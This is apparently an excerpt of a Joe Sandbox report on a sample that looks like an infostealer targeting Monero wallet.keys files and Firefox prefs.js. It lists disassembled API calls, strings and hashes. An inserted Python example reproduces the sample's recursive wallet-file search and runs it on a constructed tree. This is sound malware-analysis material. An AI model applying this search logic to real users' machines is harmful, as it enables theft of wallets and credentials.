                              APIs
                              • wsprintfA.USER32 ref: 0014ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0014ED55
                              • StrCmpCA.SHLWAPI(?,00161538), ref: 0014EDAB
                              • StrCmpCA.SHLWAPI(?,0016153C), ref: 0014EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0014F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 0fd6a0b26e81d447996550f7a4290312a4cb3937e1b9da8e6f01561481918b7c
                              • Instruction ID: fadd55c65342fa6d83c6ffd523dc41b93d0efc58026e1c74ebe2931b4cc931c8
                              • Opcode Fuzzy Hash: 0fd6a0b26e81d447996550f7a4290312a4cb3937e1b9da8e6f01561481918b7c
                              • Instruction Fuzzy Hash: 48E1D171951118DAEB55FB60CC52EEE733CAF64302F804299B91A66052EF706F8ECF52
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001615B8,00160D96), ref: 0014F71E
                              • StrCmpCA.SHLWAPI(?,001615BC), ref: 0014F76F
                              • StrCmpCA.SHLWAPI(?,001615C0), ref: 0014F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0014FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: fdaed274993f4e09b78e53f489d3f19ac5d189babf6784a5f48dd2022d5dc760
                              • Instruction ID: 44bea2e385826463c2474d4e9d6247e55ead3734a32845d496fc36b6ef5b7287
                              • Opcode Fuzzy Hash: fdaed274993f4e09b78e53f489d3f19ac5d189babf6784a5f48dd2022d5dc760
                              • Instruction Fuzzy Hash: 77B15471940118DBDB24FF60DC55AEE7379AF64301F8082A8A81A9B151EF316B4ECF92
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0016510C,?,?,?,001651B4,?,?,00000000,?,00000000), ref: 00141923
                              • StrCmpCA.SHLWAPI(?,0016525C), ref: 00141973
                              • StrCmpCA.SHLWAPI(?,00165304), ref: 00141989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00141D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00141DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00141E20
                              • FindClose.KERNEL32(000000FF), ref: 00141E32
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 414b4e0a94682e06a97e26887043ab4fcc6c6b220ee8ed7571cc55be307b854c
                              • Instruction ID: b56f3b98657f2d05603859b66b390226a4a477ea817e5c655f1efa97b01857fe
                              • Opcode Fuzzy Hash: 414b4e0a94682e06a97e26887043ab4fcc6c6b220ee8ed7571cc55be307b854c
                              • Instruction Fuzzy Hash: 4312D171990118DBDB15FB60CC96AEE7378BF64302F804299B9166A091EF706F8DCF91
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00160C2E), ref: 0014DE5E
                              • StrCmpCA.SHLWAPI(?,001614C8), ref: 0014DEAE
                              • StrCmpCA.SHLWAPI(?,001614CC), ref: 0014DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0014E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 23719186d9975c5a9ba1dab9664fcfe2413073b684401c6aeb15b5aa65fe35ce
                              • Instruction ID: 5d62f1836a2e9c5c9ea8d2abbac53f86c13e3a7066668cf245876ae8840d0d33
                              • Opcode Fuzzy Hash: 23719186d9975c5a9ba1dab9664fcfe2413073b684401c6aeb15b5aa65fe35ce
                              • Instruction Fuzzy Hash: 07F18F71894118DADB15EB60DC95EEE7378BF24302FC042D9B91A66091EF706B8ECF51
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001614B0,00160C2A), ref: 0014DAEB
                              • StrCmpCA.SHLWAPI(?,001614B4), ref: 0014DB33
                              • StrCmpCA.SHLWAPI(?,001614B8), ref: 0014DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0014DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: d43de36d7026f0fd913886a3be0b0ae5663e1f02c81d49c34c85449201964023
                              • Instruction ID: 2b35a651c25f321fcd101e31b7c22c1f2d307c387dafdf428ee4a7236600701e
                              • Opcode Fuzzy Hash: d43de36d7026f0fd913886a3be0b0ae5663e1f02c81d49c34c85449201964023
                              • Instruction Fuzzy Hash: 69917472940204E7CB14FBB0EC569ED777DAF98301F808659FD1A9A191EF349B0D8B92
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,001605AF), ref: 00157BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00157BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00157C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00157C62
                              • LocalFree.KERNEL32(00000000), ref: 00157D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: d25ceac9644fcf1be972eef8481fe40dee2065e040720a2ad53781118ef732e7
                              • Instruction ID: 06a82af7b36e3a99b07f794f35eee6fa88bc41afed311cbcd44af151a7651cbc
                              • Opcode Fuzzy Hash: d25ceac9644fcf1be972eef8481fe40dee2065e040720a2ad53781118ef732e7
                              • Instruction Fuzzy Hash: 8D418171940218EBDB24DB94DC99BEEB778FF54301F5042D9E81966180DB342F89CFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #Y{o$CD6}$Cp_[$Pkm$^8W $b{Z$-Z
                              • API String ID: 0-1148734220
                              • Opcode ID: 922de5545d049468175c30fad4990fb7ca71a32da222e2ae79faad4121082066
                              • Instruction ID: bdbd98a25674a96405b71936d66fb48ba0a21229d4d3069f21e0d1c5cdb5fe13
                              • Opcode Fuzzy Hash: 922de5545d049468175c30fad4990fb7ca71a32da222e2ae79faad4121082066
                              • Instruction Fuzzy Hash: 7DB2F6F3A0C2009FE3046E2DEC8567ABBEAEFD4720F16493DE6C4C7744EA7558058696
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00160D73), ref: 0014E4A2
                              • StrCmpCA.SHLWAPI(?,001614F8), ref: 0014E4F2
                              • StrCmpCA.SHLWAPI(?,001614FC), ref: 0014E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 178a3d3a22e04c997d82a96f483931aa579ff0ffc65bf5ff3e30f5d12c5f4f73
                              • Instruction ID: d7a3160beb44a35df8ef77c774e8217bca70d5212a788fc30b4f932c80f65e4d
                              • Opcode Fuzzy Hash: 178a3d3a22e04c997d82a96f483931aa579ff0ffc65bf5ff3e30f5d12c5f4f73
                              • Instruction Fuzzy Hash: FA123371990118DADB15FB60DC96EED7378BF64302F804299B91A9A091FF306F4DCB92
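The FindFirstFileA / FindNextFileA record above, together with the lstrcpy/lstrcat subcalls that reference `\Monero\wallet.keys`, has the shape of a recursive file grabber: open a search on `<dir>\*.*`, skip two fixed entries, recurse into directories, and compare file names against a target list. The Python below is an added example written for this page (not code from the sample, from Stealc or from Joe Sandbox) that reproduces those loop semantics against a constructed directory tree. It assumes the two StrCmpCA targets are `.` and `..` (the two string pointers are 4 bytes apart, which fits but is not stated on the page), that names are compared case-sensitively as StrCmpCA does, and it adds a depth limit the page says nothing about.

```python
"""Emulation of the FindFirstFileA("<dir>\\*.*") / FindNextFileA loop seen in the
record above. Added example, not code from the sample. Assumptions: the two
StrCmpCA checks skip "." and "..", matches are case-sensitive (StrCmpCA, not
StrCmpICA), and recursion is bounded by max_depth."""
import os
import tempfile
from pathlib import Path

# "wallet.keys" is on the page; any further target names would be assumptions.
TARGET_NAMES = ("wallet.keys",)


def walk_like_findfirst(root, targets=TARGET_NAMES, max_depth=8):
    """Return full paths of files whose name is exactly one of `targets`."""
    hits = []

    def _walk(directory, depth):
        if depth > max_depth:
            return
        # FindFirstFile yields "." and ".." before real entries; os.listdir does
        # not, so they are prepended here to mirror the sample's two StrCmpCA skips.
        for name in [".", ".."] + sorted(os.listdir(directory)):
            if name == "." or name == "..":
                continue
            full = os.path.join(directory, name)
            if os.path.isdir(full) and not os.path.islink(full):
                _walk(full, depth + 1)          # recurse, like a nested FindFirstFile
            elif name in targets:               # exact, case-sensitive compare
                hits.append(full)

    _walk(root, 0)
    return hits


def build_sample_tree():
    """Constructed stand-in for a user profile (not taken from the report)."""
    root = tempfile.mkdtemp(prefix="profile_")
    (Path(root) / "Monero").mkdir()
    (Path(root) / "Monero" / "wallet.keys").write_bytes(b"\x00" * 16)
    (Path(root) / "Documents" / "notes").mkdir(parents=True)
    (Path(root) / "Documents" / "notes" / "todo.txt").write_text("x")
    # Differs only in case: a case-sensitive compare must not match it.
    (Path(root) / "Documents" / "Wallet.Keys").write_text("decoy")
    return root


def demo():
    """Run the walker over the constructed tree; paths are returned Windows-style."""
    root = build_sample_tree()
    return [os.path.relpath(p, root).replace(os.sep, "\\")
            for p in walk_like_findfirst(root)]


if __name__ == "__main__":
    print(demo())
```

The point an analyst takes from the record is less the walk itself than its targets: the literal strings passed to the path builder (here `\Monero\wallet.keys`) are what turn a generic directory enumeration into a wallet grabber, and they are the strings worth extracting from the other lstrcpy/lstrcat subcalls of the same function.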
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: w}$,Jm$<M+%$@[Oo$A:'{$QP.
                              • API String ID: 0-930614444
                              • Opcode ID: edb0722e64e320f2b612cf4c8c5e46ed38e68dbae2ffcf609b124f0d62d545db
                              • Instruction ID: ffa46bfe93bbef74129ea4bf01d47b2acb0fc754356b12af2ea39d9f39c10602
                              • Opcode Fuzzy Hash: edb0722e64e320f2b612cf4c8c5e46ed38e68dbae2ffcf609b124f0d62d545db
                              • Instruction Fuzzy Hash: FCB2F8F36082049FE304AE2DDC8567AFBE9EFD4720F1A493DEAC4C7744E63598058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                               • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
